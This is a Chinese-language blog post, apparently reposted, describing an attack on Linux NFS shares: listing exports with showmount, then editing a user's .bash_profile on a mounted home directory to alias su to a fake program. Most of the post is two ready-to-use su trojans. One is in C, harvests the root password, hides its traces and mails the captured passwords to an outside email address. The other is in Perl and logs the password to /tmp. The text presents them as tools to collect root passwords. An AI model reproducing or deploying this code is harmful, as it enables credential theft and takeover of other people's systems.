基于Linux NFS的攻击

简介:

NFS是Linux主机通过网络共享文件的标准方法。客户端加载服务器上的目录,然后就可以访问本地磁盘存储一样访问文件,一般与NIS同时使用,但是NFS也同NIS一样,存在着不少的安全隐患。

通过showmount -e可以得到某台主机开放的共享文件目录,甚至可以从中获取到其中的一些访问规则,如果NFS主机提供了home目录的加载,我们则可以修改用户的配置文件,例如将su定义一个别名,这个别名我们写一个欺骗su程序,网站也有很多现成的,也可以参考我之前提供的两个fuck su的方法:

  1. /*   
  2.  * kpr-fakesu.c V0.9beta167 ;P  
  3.  * by koper <koper@linuxmail.org>  
  4.  *  
  5.  * Setting up:  
  6.  * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c  
  7.  * admin@host:~$ mv .su /var/tmp/.su  
  8.  * admin@host:~$ cp .bash_profile .wgetrc  
  9.  * admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile  
  10.  * admin@host:~$ logout  
  11.  * *** LOGIN ***  
  12.  * admin@host:~$ su  
  13.  * Password:   
  14.  * su: Authentication failure  
  15.  * Sorry.  
  16.  * admin@host:~$ su  
  17.  * Password:   
  18.  * root@host:~# logout  
  19.  * admin@host:~$ cat /var/tmp/.pwds  
  20.  * root:dupcia17  
  21.  * admin@host:~$   
  22.  *   
  23.  * /bin/su sends various failure information depending on the OS ver.  
  24.  * Please modify the source to make it "fit" ;)  
  25.  *   
  26.  */ 
  27.  
  28. #include <stdio.h>  
  29. #include <stdlib.h>   
  30.   
  31. main(int argc, char *argv[]){   
  32.   
  33. FILE *fp;   
  34. char *user;   
  35. char *pass;   
  36. char filex[100];   
  37. char clean[100];   
  38.   
  39. sprintf(filex,"/var/tmp/.pwds");   
  40. sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/admin/.wgetrc /home/admin/.bash_profile");   
  41. if(argc==1) user="root";   
  42. if(argc==2) user=argv[1];   
  43. if(argc>2){   
  44.    if(strcmp(argv[1], "-l")==0)   
  45.      user=argv[2];   
  46.    else user=argv[1];}   
  47.   
  48. fprintf(stdout,"Password: "); pass=getpass ("");   
  49. system("sleep 3");   
  50. fprintf(stdout,"su: Authentication failure\nSorry.\n");   
  51.   
  52. if ((fp=fopen(filex,"w")) != NULL)   
  53.   {   
  54.   fprintf(fp, "%s:%s\n", user, pass);   
  55.   fclose(fp);   
  56.   }   
  57.   
  58. system(clean);   
  59. system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");   
  60.   
  61. /* If you don't want password in your e-mail uncomment this line: */  
  62.   
  63. system("uname -a >> /var/tmp/.pwds; cat /var/tmp/.pwds | mail kalikosta@hotmail.com");   
  64.   

 

  1. #!/usr/bin/perl  
  2.  
  3. ####################################################################################################  
  4. # kyle@freeshell.se 2006 su trojan check so the su path is correct.                                 #  
  5. # then make alias for trojan first it reads the pass then exec the real su.                       #  
  6. # logging to /tmp/.pass                                                                         #               
  7. ####################################################################################################   
  8.   
  9.   
  10. print "Password: "; $s1=<STDIN>;   
  11. print "Sorry.\n";   
  12. $s2="Password is: ";   
  13. $s3=`date +%Y-%m-%d`;   
  14. open (users, ">>/tmp/.pass") || die ("Could not open file. $!");   
  15. print users ($s2, $s1,$s3);   
  16. close (users);   
  17.   
  18. system("/bin/su")   

如此等待数小时,我们就可能获取到不少主机的root密码呢?虽然在linux提供了比NFS更安全的AFS来替换,不过AFS的复杂管理让不少管理员还是很少使用。

 


















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/425411,如需转载请自行联系原作者

相关文章
|
Linux
Linux安装NFS挂载NFS卸载客户端服务端都有
Linux安装NFS挂载NFS卸载客户端服务端都有
331 0
|
8月前
|
安全 网络协议 Linux
结合 `nc` 工具利用笑脸漏洞(Smile Bug)攻击 Metasploitable2 Linux
本文介绍如何使用 `nc`(Netcat)工具结合笑脸漏洞(Smiley Bug)攻击 Metasploitable2 Linux 靶机。首先概述了 `nc` 的基本功能和高级用法,包括建立连接、监听端口、文件传输等操作。接着详细描述了笑脸漏洞的原理及其在网络攻防中的应用,展示了通过 `nc` 发送恶意输入检测漏洞的方法。最后结合 Python 脚本实现更复杂的攻击场景,并强调了合法性和环境隔离的重要性。
181 13
|
9月前
|
Ubuntu Unix Linux
Linux网络文件系统NFS:配置与管理指南
NFS 是 Linux 系统中常用的网络文件系统协议,通过配置和管理 NFS,可以实现跨网络的文件共享。本文详细介绍了 NFS 的安装、配置、管理和常见问题的解决方法,希望对您的工作有所帮助。通过正确配置和优化 NFS,可以显著提高文件共享的效率和安全性。
1900 7
|
网络协议 Unix Linux
Linux 多种方式实现文件共享(三)NFS 6
【8月更文挑战第6天】NFS 即网络文件系统,是一种使用于分布式文件系统的协议,NFS 功能是通过网络让不同的机器,不同的操作系统能够彼此分享各自的数据,让应用程序在客户端通过网络访问位于服务器磁盘中的数据
262 13
|
Ubuntu Linux
内核实验(四):Qemu调试Linux内核,实现NFS挂载
本文介绍了在Qemu虚拟机中配置NFS挂载的过程,包括服务端的NFS服务器安装、配置和启动,客户端的DHCP脚本添加和开机脚本修改,以及在Qemu中挂载NFS、测试连通性和解决挂载失败的方法。
793 0
内核实验(四):Qemu调试Linux内核,实现NFS挂载
|
运维 Ubuntu 安全
在Linux中,如何配置NFS共享?
在Linux中,如何配置NFS共享?
|
网络协议 Ubuntu Linux
在Linux中,如何使用NFS和Samba共享文件和目录?
在Linux中,如何使用NFS和Samba共享文件和目录?
|
存储 Linux 网络安全
[linux]搭建nfs
[linux]搭建nfs
|
存储 Linux 网络安全
【Azure 存储服务】如何把开启NFS 3.0协议的Azure Blob挂载在Linux VM中呢?(NFS: Network File System 网络文件系统)
【Azure 存储服务】如何把开启NFS 3.0协议的Azure Blob挂载在Linux VM中呢?(NFS: Network File System 网络文件系统)
173 0
|
监控 安全 Linux
在Linux中,DDOS攻击的原理是什么?
在Linux中,DDOS攻击的原理是什么?